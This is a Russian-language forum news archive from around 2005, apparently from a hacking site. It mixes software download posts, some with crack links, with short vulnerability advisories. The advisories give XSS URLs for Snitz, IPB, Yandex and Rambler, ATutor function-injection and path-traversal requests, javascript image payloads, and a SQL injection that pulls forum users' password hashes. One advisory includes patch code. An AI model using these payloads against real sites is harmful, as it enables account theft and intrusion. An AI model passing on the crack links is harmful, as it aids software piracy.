Архив новостей (2004-2015 год)

Статус
Закрыто для дальнейших ответов.
Hacking Firefox: Hacks, Mods, and Customizations
55960046_387111d288_o.jpg

If you dont use firefox, start now!!

They dreamed of a better browser... and before you could say "explore no more," Firefox was born. But already you want more. Tighter security, greater functionality. A custom installation for Linux. Maybe even that unique extension you've always dreamed of creating. Well, if you want to tweak the Fox, here are over 400 pages of ways to do it. From hacking profile settings to cracking links and cleaning out the cookie jar, this is the stuff
[New$paN]
:zns5: Скачать|Download - 14 метров
 
А.Я. Архангельский C++ Builder 6
1000021374.jpg


Код:
издательство: Бином
дата выхода: январь 2003
ISBN 5-7989-0239-0
тираж 4000 экз.
страниц: 1152; масса, г.: 1210; размеры (высота, ширина, толщина), см.: 25x17x6
приложение: дискета
обложка: твердая;
иллюстрированное издание
Книга содержит методические и справочные материалы по новой версии системы визуального объектно-ориентированного программирования C++Builder 6 и предшествующим версиям C++Builder 5 и 4. Рассмотрены такие новые возможности C++Builder, как кросс-платформенные приложения, технологии доступа к данным ADO, InterBase Express, dbExpress, компоненты — серверы COM, технологии распределенных приложений COM, CORBA, MIDAS, новая методика диспетчеризации действий. Дается методика построения прикладных программ, реализующих текстовые и графические редакторы, мультипликацию и мультимедиа, работу с базами данных, создание отчетов, приложений для Интернет, распределенных приложений, клиентов и серверов. Справочная часть книги содержит материалы по языку C++, функциям C++Builder и API Windows (свыше 570 функций), типам и классам C++Builder, их свойствам, методам и событиям. Книга рассчитана как на начинающих, владеющих только основами какого-нибудь языка программирования, так и на опытных разработчиков.[New$paN]
:zns5: Скачать|Download - 18 метров
 
Межсайтовый скриптинг в Snitz Forums 2000
logo_snitz_forums_2000.gif

Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует при обработке входных данных в параметре type сценария post.asp. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта.

Баг есть в Snitz Forums 2000 3.4.05 и более ранних версиях
Подробности - далее..[New$paN]

Примеры:
Код:
http://[host]/snitz/post.asp?method=Topic
&FORUM_ID=1&CAT_ID=1&type=[code]

:zns2: Производитель
 
Межсайтовый скриптинг в Elite Forum (<=1.0.0.0)
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена при обработке входных данных. Удаленный пользователь может создать специально сформированное сообщение и выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта. [New$paN]
Примеры:
Код:
< img src="javascript:void(window.location=('imagelink'))"> - Replace the imagelink with the link to the image you want to redirect the users viewing the topic containing this code.
<img src="javascript:a=100;while(a>=0){alert(a);a--}">
<img src="javascript:a=1;while(a>0){alert("sup?")">
:zns2: Производитель
 
Множественные уязвимости в ATutor 1.5.1-pl1 и более ранние версии
at-logo.v.3.gif

Обнаруженные уязвимости позволяют удаленному пользователю выполнить произвольные команды, просмотреть файлы и произвести XSS нападение.
Подробнее-далее...[New$paN]

1. Уязвимость существует при обработке входных данных в параметрах "addslashes", "asc" и "desc" сценария include/html/forum.inc.php. Удаленный пользователь может выполнить произвольную PHP функцию на системе с любыми параметрами. Удачная эксплуатация уязвимости возможна при включенной опции register_globals в конфигурационном файле PHP. Пример:

Код:
http://[host]/include/html/forum.inc.php?
addslashes=[function]&asc=[parameter]

http://[host]/include/html/forum.inc.php?
addslashes=[function]&desc=[parameter]

2. Обход каталога возможен из-за недостаточной обработки входных данных в параметре section в сценариях body_header.inc.php и print.php. Удаленный пользователь может с помощью символов обхода каталога просмотреть произвольные файлы на системе. Пример:

Код:
http://[host]/documentation/common/
body_header.inc.php?section=[file]%00

http://[host]/documentation/common/
print.php?section=[file]%00

3. Межсайтовый скриптинг возможен из-за недостаточной обработки входных данных в параметре _base_href сценария admin/translate.php, параметре _base_path сценария include/html/editor_tabs/news.inc.php и параметре "p" сценария documentation/add_note.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
 
imageshackuploader8mq.jpg

ImageShack® QuickLoad - это фирменная утилита от всемирно известного сервиса загрузки и хранения графических изображений ImageShack®.
Работать с ней предельно просто. После установки, правой кнопкой мыши кликаете на выбранном изображении (фотографии, обои и т.д.) и отсылаете файл на ImageShack, после того как файл загрузится на сервер, вам подробно опишут где и куда он помещён. Удобно и очень практично!

Для более расширенных функциональных способностей это утилиты, Вам всё таки нужно зарегистрироваться на Сервисе. Но при этом Вы сможете управлять всеми своими загруженными картинками![New$paN]
:zns5: Скачать|Download
 
Tuneup Utilities 2006 5.0.2331
box_system_en.jpg

Пакет утилит, предназначенный для оптимизации и поддержания нормальной работы операционной системы Windows. Все утилиты этого пакета объединены в единую графическую оболочку. Для запуска той или иной утилиты нужно выбрать её название в списке и кликнуть по ней мышкой. После этого открывается диалоговое окно, в котором и производятся все соответствующие действия.

Возможности пакета TuneUp Utilities 2006 весьма обширны :
- астройка различных системных функций
- оптимизация работы оперативной памяти
- сбор подробной информации о системе (как программной, так и аппаратной её частей)
- очистка битых ярлыков и мёртвых ссылок
- встроенный редактор реестра
- удаление файлов с жёсткого диска без возможности их восстановления.
- Работать с этой программой легко в плане того, что не нужно выполнять сложных и непонятных действий. Работает только под WinNT/2k/XP
- Новое! Полностью переделаный интерфеис
- Новое! Обнаружение ошибок более чем в 400% раз
- Новое! Конфигурация и оптимизация с Mozilla Firefox [New$paN]
:zns5: Скачать|Download
:zns1: Крэк|Crack
:zns2: Домашняя страница
 
XSS на Yandex
logo76x44.gif

Подробнее о нахождении бага можно почитать тут: Бажный header() под микроскопом.

А суть баги в следующем:
Код:
http://yandex.ru/redir/?url=[XSS]
 
XSS язвочка в rambler.ru
rambler.gif

Буду краток: вот суть баги:
Код:
http://rambler.ru/click?_URL=[XSS]

Нашел ее drmist. Почитать о ней можно в его статье: Бажный header() под микроскопом.
 
XSS в IPB 2.1
ipb_box.jpg

Уязвимость позволяет удаленному пользователю совершать XSS комманды на машине.
Пример:
Код:
http://localhost/2p1p0b3/upload/admin.php?adsess=[xss]&act=login&code=login-complete
http://localhost/2p1p0b3/upload/admin.php?adsess=[id]&section=content&act=forum&code=new&name=[xss]
http://localhost/2p1p0b3/upload/admin.php?name=[xss]&description=[xss]
 
GoldWave 5.11
control.png


GoldWave - это звуковой редактор с широкими возможностями. Несмотря на скромные размеры, программа имеет мощный инструментарий для обработки и редактирования звука. С помощью GoldWave можно применять всевозможные эффекты (добавлять эхо, эффект "увядания" звука Fade, редактировать эквалайзером и пр.) убирать шумы, реставрировать старые записи и т. д. Программой поддерживаются следующие звуковые форматы: *.wav, *.mp3, *.ogg, *.aiff, *.au, *.vox.[New$paN]
:zns5: Скачать|Download
:zns1: Кряк|Crack
 
OpenVPN 2.0.5
status.png

OpenVPN 2.0.5 GUI 1.0.3 - распространяемый под лицензией GPL демон для кроссплатформенного соединения нескольких приватных сетей шифрованным туннелем, т.е. для образования VPN (Virtual Private Network).
Проброс IP подсети или виртуального ethernet адаптера (virtual ethernet brige) организуется через шифрованный UDP туннель. Поддерживается система ограничения трафика (traffic-shaping) и сжатия передаваемых данных. Предусмотрена работа туннеля при использовании DHCP, dialup, NAT.[New$paN]
:zns5: Скачать|Download
 
IRLink.3
irl3_submit.jpg

У вас есть TV тюнер, тогда это программа просто необходима вам.
Она позволяет настраивать пульт ДУ на управление абсолютно любыми приложениями: проигрывателями фильмов, плеерами для музыки, просмоторщиками картинок и фотографий, читалками электронных книг, программами для тв-тюнеров.
Большая база преднастроенных плагинов (более 60!) позволяет все задания, которые выполняются в разных программах с помощью мышки и клавиатуры, выполнять с пульта. Все команды понятно сфорулированы (напр., “Пауза в Winamp”), а специальные помощники помогут автоматически настроить управление найденными на вашем компьютере программами за 3 щелчка мышки.[New$paN]

Особенности программы IRLink.3:

# обширная библиотека плагинов (более 60 программ!) с подготовленными настройкми разных мультимедийных программ (Winamp, MediaPlayer, PowerDVD, WinDVD, Light Alloy, Jet Audio, ACD See, Irfan View и многими другими)
# настройка IRLink.3 для эмуляции горячих клавиш в любимом приложении и управление им, используя только пульт
# запуск приложения или открытие файла по нажатию клавиши пульта
# дистанционное выключение компьютера или монитора
# множество операций над Windows
# настройка под практически любые пульты, которые вам понравятся
# обработка длительных нажатий клавиш
# защита от скидывания программы с системный своп при бездействии (напр., при просмотре кино)

В настоящее время поддерживаются следующие модели:
# AverMedia 305 и 307
# Beholder 401, 403, 405, 407, 409, Columbus, 507 RDS
# GeniusTVPro
# Gotview PCI 878, 7134, 7135, DVD
# Pinnacle 100i, 300i, PCTV Stereo
# e-TV
# RoverMedia TV Link Pro PCI
# FlyTV Prime 34 FM
# LifeView FlyVideo 2000/3000

:zns5: Скачать|Download

Для работы необходимы Java и Флеш плеер
 
AutoRun Assistant Pro 3.0.3
capture19gu.jpg


Довольно удобная программа для создания автозапускающихся (autorun) дисков (не путать с созданием меню-проводника по диску). Сам процесс создания выполнен в виде пошагового мастера, по окончании которого у Вас будет возможность определиться с несколькими параметрами и создать autorun-проэкт. Из возможностей следует отметить возможность добавления splash screen, который будет появляться когда диск вставлен в cd-rom, кроме того, автозапуск диска можно защитить паролем, если не хотите чтобы диск смотрели все подряд, выбор программы просмотра для определённого типа файлов и т.д.[New$paN]
:zns5: Скачать|Download
:zns1: Крэк|Crack
 
CCProxy 6.3.2
ccproxy-download.gif


CCProxy - Отличная программа прокси-сервер. проста в настройке и установке. Обеспечивает веб кеширование и фильтрацию веб адрессов,разрешение дипазона Web/IP/MAC/IP, полномочие каскадирования.[New$paN]
:zns5: Скачать|Download
:zns1: Кряк|Crack
 
QIP 2005a Build 7600 (Ru, En)

[RU]
Рекомендуется устанавливать в пустую папку, а не поверх старой,
так как обновления есть и в языковых модулях, и в скине.

Добавлено:
- возможность передачи файлов (включается в настройках);
- относительные пути в файлах конфигурации;
- кнопка приложения на панели задач (по многочиленным просьбам админов
интернет-кафе, клубов и тд);
- увеличение иконок/аватаров контактов при наведении мышкой
(вкл в настройках);
- выбор статусов через контекстное меню в системном лотке;
- новые опции для истории сообщений;[New$paN]

Обновлено/Исправлено:
- пользователькое соглашение;
- модуль менеджера учетных записей
- сетевой модуль
- модуль протокола
- модуль иконок/аватаров контактов
- идентификация клиентов
- алгоритм шифрования пароля
- модуль работы с сообщения защищенные паролем (несовместимо
с предыдущими версиями)


:zns5: Скачать|Download
 
Sql injection in ibProArcade.
Найдена уязвимость в популярном форумном модуле ibProArcade 2.x (для vBulletin и для IPB). Классифицируется баг, как средней критичности.
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Существует уязвимость в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Подробнее - далее...[New$paN]
Инъекция:
Код:
module=report&user=[userid]
Запрос:
Код:
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
 
Недавно были найдены баги в популярнейшем двиге sPaize Nuke.
1. Уязвимость в модулях поиска, пример использования:
http://test.ru/modules.php?name=Articles&f...бла%20бла%20бла[XSS CODE]&cat_id=&type=articles

2. Уязвимость в админке, в модуле "переходы с сайтов". Баг позволяет внедрить в тело админки через параметр рефери скрипт. Рефери, содержащие html-код, будет восприниматься не как текст, а как код.
Инфа по закрытию бага далее...[New$paN]
Закрываем баг:
search.php
Открываем файл modules/Articles/search.php, находим там 12 строку:
$pagetitle = _M_ART8." : ".$_GET['query'];
заменяем ее на:
$pagetitle = _M_ART8." : ".htmlspecialchars($_GET['query']);
Открываем файл modules/Files/search.php, находим там 12 строку:
$pagetitle = _M_FILES44." : ".$_GET['query'];
заменяем ее на:
$pagetitle = _M_FILES44." : ".htmlspecialchars($_GET['query']);
Открываем файл modules/Links/search.php, находим там 16 строку:
$pagetitle = _M_LINKS44." : ".$_GET['query'];
заменяем ее на:
$pagetitle = _M_LINKS44." : ".htmlspecialchars($_GET['query']);


header.php
ищем такие строки:
if ($config['http_ref'])
{
$referer = getenv("HTTP_REFERER");
if ($referer != "" AND !eregi("^unknown", $referer) AND !eregi("^bookmark",$referer) AND !strpos("$referer",$_SERVER["HTTP_HOST"]))
Заменяем на:
if ($config['http_ref'])
{
$referer = getenv("HTTP_REFERER");
$referer = htmlspecialchars($referer);
if ($referer != "" AND !eregi("^unknown", $referer) AND !eregi("^bookmark",$referer) AND !strpos("$referer",$_SERVER["HTTP_HOST"]))
 
Нам исполнился год! Халява!
http://news.xss.pro/cake.jpg
12 ноября 2005 года нашему сайту исполнился целый год. Уже в течение года наш сайт существует и снабжает полезной информацией 17000 человек в день. За это время сайт вырос из совсем небольшого 25 метрового аккаунта аж до 250 метров. Среди наших пользователей есть настоящие звезды компьютерного андерграунда.
Также огромный респект людям, которые помогали с администрированием и модерированием сайта. За этот год сменилось более 40 модераторов, 3 хостинга. Около 30 раз нас ДДосили, аси флудили, мыла спамили, но мы устояли перед всеми стихийными бедствиями, обрушившимися на нас.
В этот знаменательный день на нашем сайте будет много халявы (для получания халявы требуется доступ к разделу. Как его получить написано тут.), конкурсы на ICQ номера (конкурся будут проводится в разделе конкурсов ближе к вечеру). В халяве вы найдете не только 6-значные ICQ номера, но еще и подарки от некоторых наших модеров.[New$paN]

Также вы можете сделать подарок любимому сайту.
Для подарков:
Z965428722289
E257803116775
R030329026141
U858905842888

Для других подарков - инфа для связи у меня в подписи.

Также в праздник:
1) Мы не будем понижать Вам рейтинг (в разумных пределах)
2) Процедура принятия в халяву будет мягче
3) За полезную инфу или вываленную халяву рейтинг может быть повышен. Если у вас отрицательный рейтинг - напишите здесь и если Ваше поведение на форуме за это время улучшилось - он станет нулевым.
 
Password Depot 2.5.3.0
pw_b.gif


Password Depot - у каждого из нас есть данные, которые нужно защитить от посторонних глаз. С помощью этой проги ваши секреты останутся только вашими.
Компания Ace Bit, заплатит 5 000 ?, тому кто взломает зашифорванные пароли. Пароли шифруются продуктом компании, программой Password Depot. программа предназначена для генерации и хранения различных паролей.
Разработчики считают, что на расшифорвку пароля 1 GHz-Pentium компьютеру, потребуется 307 лет![New$paN]
:zns5: Скачать|Download
:zns1: Кряк|Crack
 
Статус
Закрыто для дальнейших ответов.
Верх